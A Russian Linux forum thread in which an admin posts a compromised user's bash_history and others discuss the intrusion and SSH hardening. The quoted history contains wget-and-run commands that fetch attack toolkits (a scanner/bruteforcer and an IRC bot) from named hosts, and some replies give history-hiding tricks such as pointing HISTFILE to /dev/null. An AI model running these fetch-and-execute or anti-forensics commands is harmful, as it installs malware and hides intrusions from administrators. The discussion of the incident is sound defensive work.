LINUX.ORG.RU
ФорумTalks

юзера моего похачили =)


0

0

смотрю, чето сервак тормозить стал, глянул top, а там некий процесс от юзера жрет 95%

472 #500 25 0 468 468 392 R 87,0 0,0 0:46 0 pscan2

ну я юзера быстренько грохнул и полез к нему в bash_history :

w
ps x
cat /proc/cpuinfo
uname -a
wget sirdulce.xhost.ro/lex.tar;tar zxvf lex.tar;cd lex;./linux;
passwd
w
ps x
ls
cat /proc/cpuinfo
wget r00ney.xhost.ro/cobra2007.tar.tar
tar zxvf cobra2007.tar.tar
cd a
screen
passwd
ls
passwd
w
ls
cd a
ls
cat vuln.txt
./start 201
screen
passwd
passwd
screen -r
w
ps x
w
ps x

☆☆

Ответ на: комментарий от Anoxemian

Это алкогольный бред, не слушайте

anonymous
()
Ответ на: комментарий от Anoxemian

нет, рута походу не взломали, после удаления юзера все нормально заработало.

vilfred ☆☆
() автор топика
Ответ на: комментарий от Sun-ch

> А я ведь уже и не вспомню, как потерял девственность. На чердаке наверное или в гараже каком-нибудь.

Хулиганы затащили?

anonymous
()
Ответ на: комментарий от Sun-ch

>А я ведь уже и не вспомню, как потерял девственность. На чердаке наверное или в гараже каком-нибудь.

Больно было?

vada ★★★★★
()
Ответ на: комментарий от bizanine

>А как залезли узнал?

У юзверя, видать пасворд был: 123

vada ★★★★★
()
Ответ на: комментарий от Komintern

кстати.. проверил - работает, обновился - не работает ;)

Komintern ★★★★★
()
Ответ на: комментарий от anonymous

>Хулиганы затащили?

:-D :-D :-D :-D :-D :-D :-D :-D :-D

anonymous
()
Ответ на: комментарий от Sun-ch

>Методистки из Гороно.

Эти могут ;-)

anonymous
()

Прикольно, даже исходники к pscan2.c в архиве cobra2007.tar.tar приложил, и отладочную инфу в linux freebsd не удалил.

ilnurathome
()
Ответ на: комментарий от ilnurathome

Я так понимаю, он использует чужой инструментарий. Там даже копирайты почти везде стоят.

Davidov ★★★★
()

pscan2 -- сканилка сети, подбиралка паролей (пакет cobra2007)
lex - IRC бот.

Нифига он не поднял себе привелегии, считай что пронесло :)

gnomino
()

я наверное что-то не понимаю, но код

if [ -f a ]; then
./a $1.0
./a $1.1
./a $1.2
....
./a $1.253
./a $1.254
./a $1.255
fi

не проще ли заменить на что-то вроде

for i in `seq 1 256`; do
    ./a $1.$i
done

исполняемые слинковать статиком с dietlibc, стрипнуть sshd ну и пр. по мелочам.

мельчают нынче студенты :-/

// wbr


// wbr

klalafuda ★☆☆
()
Ответ на: комментарий от klalafuda

>мельчают нынче студенты :-/

ни че, непуганных Одминов сейчас гора, обожди виндузятники поддтянутся, во веселье будет.

gnomino
()
Ответ на: комментарий от Osmos

> я не догнал, он через ssh вломилсо?

да нет, через консоль. просто вчера вилфреду ацетон попался дюже ядрёный..

// wbr

klalafuda ★☆☆
()
Ответ на: комментарий от gnomino

А советы наверное стандартные

1. перейти на авторизацию ключами, если возможно, что бы не буртфорсили

2. в фаейрволе ограничить подключения по порту с ip по времени, не больше 1 раза в 15-30 сек, что бы не буртфорсили

3. использовать chrooted ssh, чтобы ограничить в командах и в последствиях взлома для системы в целом.

4. что нибудь еще.

ilnurathome
()
Ответ на: комментарий от ilnurathome

> 2. в фаейрволе ограничить подключения по порту с ip по времени, не больше 1 раза в 15-30 сек, что бы не буртфорсили

зато теперь могут отлично досить :)

ps: IMHO аутентификации по ключам выше крыши. суметь подобрать 2k ключ - IMHO ребята с такими скилами к вилфреду в обсерваторию не сунутся :)

// wbr

klalafuda ★☆☆
()
Ответ на: комментарий от ilnurathome

Просто пароль букафф 14-20, вход по ssh только одному юзеру (естесстно не руту), с ограниченного колличества адресов, хотя можно и по ключам аутентификацию.

gnomino
()
Ответ на: комментарий от magesor

Тот же nessus определит сразу, да и nmap вроде это умеет, так что в принципе защита только от пионЭров.

gnomino
()
Ответ на: комментарий от magesor

Не знаю как вы, я лично для себя предпочитаю VPN

vzard
()

>ну я юзера быстренько грохнул и полез к нему в bash_history :

чёт молодёж неаккуратно работает ;)

Нет чтобы кинуть с хистори симлинк на /dev/null хотя бы из шела выходили бы через SIGKILL ;)

sS ★★★★★
()
Ответ на: комментарий от sS

> Нет чтобы кинуть с хистори симлинк на /dev/null хотя бы из шела выходили бы через SIGKILL ;)

export HISTFILE=/dev/null гуру блин..

// wbr

klalafuda ★☆☆
()

гыгы. Второй год прошел уже, как я отошел от дел лечения серверов от этой гадости, а эти киддисы так и не научились что-то автоматизировать и писать нормальные скрипты. лол. Хорошо было бы если бы все хакеры были этого уровня. за сервера можно было бы не волноваться. :)

А про факт взлома, какой же мудак выставляет ssh в мир на дефолтовом порту. Темболее зная про свой лоховский пароль.

mrdeath ★★★★★
()
Ответ на: комментарий от sS

>> export HISTFILE=/dev/null гуру блин.. > те же 0_0 только сбоку

те-же? по сравнению с модификацией содержимого домашнего каталога? ну-ну. хакеры блин :-/

// wbr

klalafuda ★☆☆
()
Ответ на: комментарий от gnomino

> Это не хак, а так,

Если сразу не хак, а так.
Если сразу не разберешь
Плох он или хорош

friday ★★★
()
Ответ на: комментарий от mrdeath

> А про факт взлома, какой же мудак выставляет ssh в мир на дефолтовом порту. Темболее зная про свой лоховский пароль.

С этого момента по-подробнее пожалуйста. Попробуйте kernel.org, sourceforge, прочие - ssh доступен, на порту по умолчанию. Вы считаете перевешивание ssh на другой порт серьезной мерой защиты?

gods-little-toy ★★★
()
Ответ на: комментарий от gods-little-toy

> Может вы и HTTP боитесь со стандартного порта раздавать?

по пятницам не раздаём'с

ps: а вообще, настоящие пацаны используют gopher

// wbr

klalafuda ★☆☆
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.